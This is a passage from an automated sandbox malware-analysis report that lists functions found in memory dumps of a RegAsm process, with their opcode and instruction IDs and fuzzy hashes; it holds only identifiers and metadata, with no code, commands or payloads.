                                      • Instruction Fuzzy Hash: F9419F74E012199FDB44DFA9D984AEEBBF2FB88300F10812AE815A7354DB345941CFA0
                                      Function 066692D8 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (bq
                                      • API String ID: 0-149360118
                                      • Opcode ID: e8b09a473f6c5c9348f26b36931cae5cc431d7878801e8dcd2d883479839b45d
                                      • Instruction ID: 03a33d20f89ecc2675a689514559a9af0d322ec73a088e7b9d4328292fc7e38f
                                      • Opcode Fuzzy Hash: e8b09a473f6c5c9348f26b36931cae5cc431d7878801e8dcd2d883479839b45d
                                      • Instruction Fuzzy Hash: 81419574E01219AFDB44DFA9D854BDDBBB2FB89300F208125E919BB394CB71AD45CB90
                                      Function 066692C9 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (bq
                                      • API String ID: 0-149360118
                                      • Opcode ID: 098657d8902eae5486ecab4887207ca7ebc609c71157d3e22e99d34d5cfc5028
                                      • Instruction ID: 13035929a7a8fd0392909b4385112584c89db6ddf1e113d548f0d6f9d231297f
                                      • Opcode Fuzzy Hash: 098657d8902eae5486ecab4887207ca7ebc609c71157d3e22e99d34d5cfc5028
                                      • Instruction Fuzzy Hash: F031B674E012199FDB45DFA9D854ADDBBB2FF89300F108129E815AB390DB719D45CB90
                                      Function 06664521 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LR^q
                                      • API String ID: 0-2625958711
                                      • Opcode ID: 9d384b65a9226734ff2fdc603395fc347f16bd9a1efb152f9fbccc7bd34d3895
                                      • Instruction ID: a6d35ebfd413d335dbb99105302fdf525643d7b5f1f1f5eded2c9125b1e4673a
                                      • Opcode Fuzzy Hash: 9d384b65a9226734ff2fdc603395fc347f16bd9a1efb152f9fbccc7bd34d3895
                                      • Instruction Fuzzy Hash: 3831C274E01218AFDB58DFA9E954AEEBBB2FF48315F108029E805B7350CB715941CFA1
                                      Function 06664530 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LR^q
                                      • API String ID: 0-2625958711
                                      • Opcode ID: d784f1ef18bcf51709b63f0c1f4a053d22c887535621e0fd78acdd46b89b4b0c
                                      • Instruction ID: 1a329d7bb059b9c6cd988af569f717eda16797def559fcc0abe7fc01bd98adc3
                                      • Opcode Fuzzy Hash: d784f1ef18bcf51709b63f0c1f4a053d22c887535621e0fd78acdd46b89b4b0c
                                      • Instruction Fuzzy Hash: B731E274E01218EFDB48DFA9E954AADBBB2FF88311F108029E805B7350CB315941CF61
                                      Function 0666D05A Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 4b41f7b06a7e5d38ab812996dc220e3b9dd5c4f7cfa3734a85480c25e50a2084
                                      • Instruction ID: 80d66e760c4105c14ff27c04a7f7833108cfd97ba21a8ec72c738ec9e603bdc2
                                      • Opcode Fuzzy Hash: 4b41f7b06a7e5d38ab812996dc220e3b9dd5c4f7cfa3734a85480c25e50a2084
                                      • Instruction Fuzzy Hash: 0521F274E0025A8FCB45DFAAD880AEEBBF1BF49300F10816AE415B7351D7749A45CFA1
                                      Function 0666D068 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 5ae796d65adccf5b4d96d914b944db68954134961c4a9b2d1a76fa400c5d4527
                                      • Instruction ID: b0c10ec1daeef5eb0baaa9743c1b46b4482022ffe63190c231fa5d8b00b602c8
                                      • Opcode Fuzzy Hash: 5ae796d65adccf5b4d96d914b944db68954134961c4a9b2d1a76fa400c5d4527
                                      • Instruction Fuzzy Hash: 6A21AFB4E0021A8FCB44DFAAD840AEEBBF5BF48310F108169E514B7354D774AA45CFA1
                                      Function 06664648 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (bq
                                      • API String ID: 0-149360118
                                      • Opcode ID: 5eab8f8eec230869bc08931f78d0df17bb308cc21863f5b117212b2be543c839
                                      • Instruction ID: db21d553140d3390aadf1934739a35534ecf2fab28c99df9e99d4e6a897cd9f7
                                      • Opcode Fuzzy Hash: 5eab8f8eec230869bc08931f78d0df17bb308cc21863f5b117212b2be543c839
                                      • Instruction Fuzzy Hash: D6212470E05249EFCB44DFA9E544A9EBBF1FF45301F2081A9E400AB351CB745E44DB95
                                      Function 06664658 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (bq
                                      • API String ID: 0-149360118
                                      • Opcode ID: 9fa56db5155a5b6f65c409b1af308377b2789bd8023ce4723a9ed800853a7ead
                                      • Instruction ID: bafc928a17835e457172eeaf0bbc69ec6c6b31b75f32a9d5dad92cdad17226df
                                      • Opcode Fuzzy Hash: 9fa56db5155a5b6f65c409b1af308377b2789bd8023ce4723a9ed800853a7ead
                                      • Instruction Fuzzy Hash: B911BF70A00249EFDB44DFA9E544A9DBBF1FF84304F2081A8D405A7351DB70AE45DB95
                                      Function 06668790 Relevance: .5, Instructions: 497COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d5c5d718b4834c35bbeecad31b2a23cbcb41c12b08f6ee970bdad1c0c0f65331
                                      • Instruction ID: 2b9852e0e45a2c9af98e6b879eec5d7dff2cd0e371402f0187ff796a430dfc98
                                      • Opcode Fuzzy Hash: d5c5d718b4834c35bbeecad31b2a23cbcb41c12b08f6ee970bdad1c0c0f65331
                                      • Instruction Fuzzy Hash: E5529874911228CFDB65DF64D898BDCBBB2BF49301F1085EAE54AA7250DB30AA85CF50
                                      Function 06668780 Relevance: .5, Instructions: 493COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd0276ba3db4add4d049cc26d37efe0876b40d1bef915ea2c61a95fbece1f846
                                      • Instruction ID: 85cd34eda1a3cd69b5427e0c861174f99d4ed36faf3152dd9c566cd4230eabce
                                      • Opcode Fuzzy Hash: dd0276ba3db4add4d049cc26d37efe0876b40d1bef915ea2c61a95fbece1f846
                                      • Instruction Fuzzy Hash: 86529974901228CFDB65DF24D898BDCBBB2BF49301F1085EAE54AA7350DB30AA85CF50
                                      Function 06684468 Relevance: .4, Instructions: 392COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 49314f75cf436a6b11b874c3da997608f92a38afc2553ac753bcfeb2391c8ba6
                                      • Instruction ID: 8155656ef2226fa8286d00ceb343a6737a31e794d757b6d3274e7456fc96118d
                                      • Opcode Fuzzy Hash: 49314f75cf436a6b11b874c3da997608f92a38afc2553ac753bcfeb2391c8ba6
                                      • Instruction Fuzzy Hash: 1002D2B4E0020ADFDF54DFA4D584AAEBBB6FF49311F108119E915AB350CB3199A1CFA1
                                      Function 06686098 Relevance: .3, Instructions: 305COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb1a005e67fd6428fb9927aaebb2549e417ed6e11511aa4524f27663349cd78c
                                      • Instruction ID: ec80d116b63c8afa2d39c319e9a11e455dbeba5dade2cc004efeecacfd888a59
                                      • Opcode Fuzzy Hash: fb1a005e67fd6428fb9927aaebb2549e417ed6e11511aa4524f27663349cd78c
                                      • Instruction Fuzzy Hash: 93E1F274E00219CFDB64DFA4D844B9DBBB2FF89301F1085A9E91AA7390DB31A995CF50
                                      Function 06669628 Relevance: .3, Instructions: 287COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 845b846366fb940f5ca493a2297f70e7f70ff7ca03a8b2819c1bbb514fb92202
                                      • Instruction ID: db713b2abe19cdf50e5f05aafc15712448ed05844a8af33d9c45bac0ad98a984
                                      • Opcode Fuzzy Hash: 845b846366fb940f5ca493a2297f70e7f70ff7ca03a8b2819c1bbb514fb92202
                                      • Instruction Fuzzy Hash: E2E17F74E00219CFDB54DFA9D984A9DBBB1FF49300F1085A9E90AAB365DB30AD85CF50
                                      Function 06665678 Relevance: .3, Instructions: 263COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 12bde23dedb086cbe61797e0d2d745b8fad4ae3f6d96326c3521be5afe4713e5
                                      • Instruction ID: 9566f41c4f8960b2ac72ce3dc7b21b7abbbdd497f910ae1f0067e6e2fe683d18
                                      • Opcode Fuzzy Hash: 12bde23dedb086cbe61797e0d2d745b8fad4ae3f6d96326c3521be5afe4713e5
                                      • Instruction Fuzzy Hash: 34D17174E01219DFDB54DFA9D980A9DBBB2FF48300F1081A9E909AB355DB30AA85CF51
                                      Function 06680228 Relevance: .2, Instructions: 233COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04119671a839fa7c80d9c92676fa1054c3e80f44eb0ccfacbaf681457aff3e49
                                      • Instruction ID: b671f74e26f482f78deaed2c22867c7e4ba85492a11e0f7703bcf48ba701f586
                                      • Opcode Fuzzy Hash: 04119671a839fa7c80d9c92676fa1054c3e80f44eb0ccfacbaf681457aff3e49
                                      • Instruction Fuzzy Hash: 9EB1A374E00218DFCB54DFA9D984A9DBBB2FF88315F208669E419AB355DB30A946CF40
                                      Function 0666FBA8 Relevance: .2, Instructions: 233COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 74669265ed197af5ead280a3f1a1cfbd02d0dfa804500576c9f0121114aaf6d5
                                      • Instruction ID: 04a1edb1a97e38eaa34129e2f90f17f10b3825b69db7997d4894f47c6acddd64
                                      • Opcode Fuzzy Hash: 74669265ed197af5ead280a3f1a1cfbd02d0dfa804500576c9f0121114aaf6d5
                                      • Instruction Fuzzy Hash: A5B1D374E01218CFDB64DFA5E988A9DBBB2BF89304F208569E409AB355DB305D86CF41
                                      Function 066038A8 Relevance: .2, Instructions: 221COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8689654008b3271d681ec701c690550d848dbb1485b4091901b4f3282732586c
                                      • Instruction ID: c06e4fc8c45406e154543ea5107bbd5fd5300062203d7f8c2b48f91c6affc323
                                      • Opcode Fuzzy Hash: 8689654008b3271d681ec701c690550d848dbb1485b4091901b4f3282732586c
                                      • Instruction Fuzzy Hash: 5471DF31F002068FDB59AFB8C9556AF7BF2AB89201B100979D446BB3D5EF359D02CB91
                                      Function 06660A10 Relevance: .2, Instructions: 210COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2b71a44deb3bfa53f8208135aec5c01002bd27e65aa6fb90f71c286320bd9e11
                                      • Instruction ID: d995cf8ca16bce8a96e67165af7a2f85436152c5b03fb2a77c4fc977aa047969
                                      • Opcode Fuzzy Hash: 2b71a44deb3bfa53f8208135aec5c01002bd27e65aa6fb90f71c286320bd9e11
                                      • Instruction Fuzzy Hash: C691AE74E01218CFDB58DFA9D980BADBBB2FF89300F209169D519AB394DB315982CF51
                                      Function 06686908 Relevance: .2, Instructions: 186COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c04f2a1283c26fe45f3724124cb2113a1adb6f74adcc64069b009196387fc18f
                                      • Instruction ID: c03116ed4fa82a7c7ab4736b474d8093b4f4dc616adb1028f0237ac625d9957f
                                      • Opcode Fuzzy Hash: c04f2a1283c26fe45f3724124cb2113a1adb6f74adcc64069b009196387fc18f
                                      • Instruction Fuzzy Hash: B681AE74E01218CFDB44DFA9D584A9DBBF2FF88301F208169E915AB364DB31A846CF50
                                      Function 06665A80 Relevance: .2, Instructions: 179COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8527544e0f67351448fd9235ae59185f24c4097822a3427ae9930b2ad7e945b7
                                      • Instruction ID: 8b97fcb26737047e1aa22b6cacd29ad478fd1c00ab6f25e66dfdbbd5568caac1
                                      • Opcode Fuzzy Hash: 8527544e0f67351448fd9235ae59185f24c4097822a3427ae9930b2ad7e945b7
                                      • Instruction Fuzzy Hash: 8C81D274E002488FCB44CF9AD5959EEBBF2BB89301F248599E406BB350C7359E46CFA5
                                      Function 0666C158 Relevance: .2, Instructions: 177COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da0057b79032c8d28327c8040abd237d4908b9287c94d65ca2dd0e5a649b7eac
                                      • Instruction ID: d72069791f0942b319d51089353c1dd6cec814b055418b269451c5a241019b96
                                      • Opcode Fuzzy Hash: da0057b79032c8d28327c8040abd237d4908b9287c94d65ca2dd0e5a649b7eac
                                      • Instruction Fuzzy Hash: 0D91F134E11218DFDB54DFA9E588A9CBBF6FF48301F608069E806AB364DB35A945CF40
                                      Function 06665A90 Relevance: .2, Instructions: 172COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8e60d285bdf6e1e759eeb75fb70fa038f84517b8997af3a1abd437b20ac99f4e
                                      • Instruction ID: 166c2136e5e24a3c0eb9e9fd0b3dd6e61d98ed527855c8bce36145972703dfdc
                                      • Opcode Fuzzy Hash: 8e60d285bdf6e1e759eeb75fb70fa038f84517b8997af3a1abd437b20ac99f4e
                                      • Instruction Fuzzy Hash: 8C71B074E002588FCB48CF9AD1959EDBBF2BB88305B248599E406BB354C7359E42CFA4
                                      Function 06663B81 Relevance: .2, Instructions: 167COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 46bef4fe23a5b4a0b8d6913add87be4148d4290bd29071159227b6f13799662d
                                      • Instruction ID: ef74618e23e9d692f2aedc87af397cd7f3fa7ec034da52311becdc465f5e5862
                                      • Opcode Fuzzy Hash: 46bef4fe23a5b4a0b8d6913add87be4148d4290bd29071159227b6f13799662d
                                      • Instruction Fuzzy Hash: A9614074A0020ADFDB45EFE4E954AAEBB72FF88300F104519E516B73A4CB316D89CB61
                                      Function 066808F8 Relevance: .2, Instructions: 165COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bfacada532b4c2ff823b230b7efe54acec6c6f432b374bf0df89ed278a1e55ce
                                      • Instruction ID: 8523755c593ec955c55327151b6091def090b64035207c42cf5f3756de2721e2
                                      • Opcode Fuzzy Hash: bfacada532b4c2ff823b230b7efe54acec6c6f432b374bf0df89ed278a1e55ce
                                      • Instruction Fuzzy Hash: 5B81A174E01218DFDB48DFA8D588ADDBBB2FF48311F208169E916A7350CB31A945CF60
                                      Function 066607B0 Relevance: .2, Instructions: 163COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9b61404eb2c9070ddb9af897a514d72012333ddbbe7e28b2ae1d7fce8cd8d9b1
                                      • Instruction ID: 3e79a82cfacfc65a5d048cf7ab2ba4f814ee0a2c33c28051e4f4bf07162fc2cb
                                      • Opcode Fuzzy Hash: 9b61404eb2c9070ddb9af897a514d72012333ddbbe7e28b2ae1d7fce8cd8d9b1
                                      • Instruction Fuzzy Hash: C4719574E012199FDB54DFA9E990ADDFBB2BF88300F109269D419A7355DB30A982CF90
                                      Function 066808E8 Relevance: .2, Instructions: 160COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7da8ea213c75706d4d5a2fd430a5ee64f07e0bc7c54b7b19cab98561ce881083
                                      • Instruction ID: ecf39e0c6b05bffad61726d50ff461dd089ab6e287b672f18cf057457667d5bc
                                      • Opcode Fuzzy Hash: 7da8ea213c75706d4d5a2fd430a5ee64f07e0bc7c54b7b19cab98561ce881083
                                      • Instruction Fuzzy Hash: B281D174E01218DFDB44DFA8D9889DDBBB2FF49311F20816AE915A7361C731A945CF60
                                      Function 06686089 Relevance: .2, Instructions: 159COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38c2cb289f3028d309de2f14bcce218d0b0a29cd772ae94f12e7491fca907fc7
                                      • Instruction ID: 2a83abe00c5c3c05b1544c8e80043330e75c35ec5b095b623924c73a60acc6f0
                                      • Opcode Fuzzy Hash: 38c2cb289f3028d309de2f14bcce218d0b0a29cd772ae94f12e7491fca907fc7
                                      • Instruction Fuzzy Hash: A6710574901318CFDB54DFA4D858ADDBBB2FF48310F1085A9E81AAB3A4C734A995CF60
                                      Function 0666C149 Relevance: .2, Instructions: 153COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 82218e1033a4975050cb0e0314a0bb128cfbffe847d2e34b9c99f55b767c1ac7
                                      • Instruction ID: c551d471bcb46580a347d885e74b674b84c505c7751bfaee52fc2756e481e089
                                      • Opcode Fuzzy Hash: 82218e1033a4975050cb0e0314a0bb128cfbffe847d2e34b9c99f55b767c1ac7
                                      • Instruction Fuzzy Hash: 8E71F474E11218DFDB54DFA9E588A9DBBF2FF49301F60806AE906AB354DB34A845CF40
                                      Function 0666A008 Relevance: .2, Instructions: 151COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0ffe3c6567b5901da3eb1ee813f6497d9652bad6e90ec187ff8f6e2c0a74f752
                                      • Instruction ID: 604c82fdc7b8655b147065d988982ba933284516a4d464aafb4c608badce4f65
                                      • Opcode Fuzzy Hash: 0ffe3c6567b5901da3eb1ee813f6497d9652bad6e90ec187ff8f6e2c0a74f752
                                      • Instruction Fuzzy Hash: C251AF74E012199FDB44DFAAE584AEDFBF2FF88310F14806AE909A7354D735A941CB60
                                      Function 0666F278 Relevance: .1, Instructions: 144COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bbbdc696b7e442f7dcc67744e5e798200777059bde64c38542304c0572ffba96
                                      • Instruction ID: 270edac52c5f7a6cdc0c36a9090a50b29aefa05c2b61b44456090df6cc1e37f9
                                      • Opcode Fuzzy Hash: bbbdc696b7e442f7dcc67744e5e798200777059bde64c38542304c0572ffba96
                                      • Instruction Fuzzy Hash: 0861E574E00218CFDB54DFA5D994A9EBBF2FF89300F208169D809AB355DB70A946CF51
                                      Function 06663BE5 Relevance: .1, Instructions: 141COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 653e522b9c0b051ed7f75e30ab6add0eec93487dffb9708640e9d412623a0e42
                                      • Instruction ID: c8b94534bbde3fa205e9d82acacc21c214a190b2088f4b51c5f14b6668d9e4b6
                                      • Opcode Fuzzy Hash: 653e522b9c0b051ed7f75e30ab6add0eec93487dffb9708640e9d412623a0e42
                                      • Instruction Fuzzy Hash: D651DAB4A0020AEFDB44EFE4E9546AEBB72FF88301F10442DD916773A4CA315D99CB61
                                      Function 06663BE8 Relevance: .1, Instructions: 140COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 50439aa697c130f0b6bef3b12cb908773d52f3d46085d5e22e4eea77cd8a0315
                                      • Instruction ID: 06e9a2ec8d2f200882f47e7725ed8b85b280ee8f1e115765fd5629e94aa757da
                                      • Opcode Fuzzy Hash: 50439aa697c130f0b6bef3b12cb908773d52f3d46085d5e22e4eea77cd8a0315
                                      • Instruction Fuzzy Hash: CD51DBB4A0020ADFDB44EFE4E9546AEBB76FF88301F104419D916773A4CA315D99CB61
                                      Function 06660D40 Relevance: .1, Instructions: 138COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb43fad1098c23d93cf774033cf9e151aaf18d19ff6eec35350164363465ab90
                                      • Instruction ID: 64f41a50e09f89cacc42a657c182126f8efa6c21edd13cba0f9d1e73af98867e
                                      • Opcode Fuzzy Hash: bb43fad1098c23d93cf774033cf9e151aaf18d19ff6eec35350164363465ab90
